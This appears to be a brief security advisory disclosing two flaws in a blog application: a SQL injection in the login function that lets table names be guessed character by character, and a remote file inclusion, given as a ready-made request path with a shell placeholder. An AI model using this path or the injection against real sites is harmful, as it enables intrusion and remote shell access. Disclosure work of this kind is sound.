Found by E.Minaev ([email protected])
ITDefence.ru
1) SQL Injection in the login function. This injection makes it possible to brute-force the table names of the
blog's database character by character (magic_quotes_gpc must be turned off).
2) Remote File Inclusion (RFI)
/includes/sessions.php?wb_class_dir=shell?